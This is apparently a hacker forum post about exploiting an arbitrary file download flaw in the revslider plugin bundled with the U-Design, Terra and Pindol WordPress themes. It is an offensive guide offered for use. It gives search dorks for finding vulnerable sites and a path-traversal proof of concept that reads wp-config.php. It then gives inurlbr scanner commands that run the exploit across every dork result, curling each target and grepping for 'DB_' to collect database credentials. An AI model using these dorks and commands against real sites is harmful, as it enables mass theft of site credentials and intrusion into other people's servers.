Exploring Wordpress Theme Arbitrary File Download Vulnerability Exploits Available
Exploring Wordpress Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification
Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
-------------------------------------------------------------------------------------------
Wordpress Theme Terra Arbitrary File Download VulnerabilityDORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------
Wordpress Theme Pindol Arbitrary File Download VulnerabilityDORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------
All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL
Exploit developed can check about 20 themes, and allows check standard as follows.
POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now lets use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork you dork -q 1,6 -s save.txt --comand-all php exploit.php _TARGET_
php inurlbr.php --dork inurl:"wp-content/themes/u-design/" -q 1,6 -s save.txt --comand-all php exploit.php _TARGET_
php inurlbr.php --dork inurl:"wp-content/themes/terra/" -q 1,6 -s save.txt --comand-all php exploit.php _TARGET_
php inurlbr.php --dork inurl:"wp-content/themes/pindol/" -q 1,6 -s save.txt --comand-all php exploit.php _TARGET_
Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
Example: --comand-vul {command}
Usage: --comand-vul nmap sV -p 22,80,21 _TARGET_
--comand-vul ./exploit.sh _TARGET_ output.txt
--comand-all Use this commmand to specify a single command to EVERY URL found.
Example: --comand-all {command}
Usage: --comand-all nmap sV -p 22,80,21 _TARGET_
--comand-all ./exploit.sh _TARGET_ output.txt
Observation:
_TARGET_ will be replaced by the URL/target found, although if the user
doesnt input the get, only the domain will be executed.
_TARGETFULL_ will be replaced by the original URL / target found.
-------------------------------------------------------------------------------------------
INURLBR ADVANCED CONTROL
php inurlbr.php --dork YOU DORK revslider -q 1,6 -s wordpress2.txt --exploit-get /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php -t 3 --exploit-comand /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php --comand-all echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"
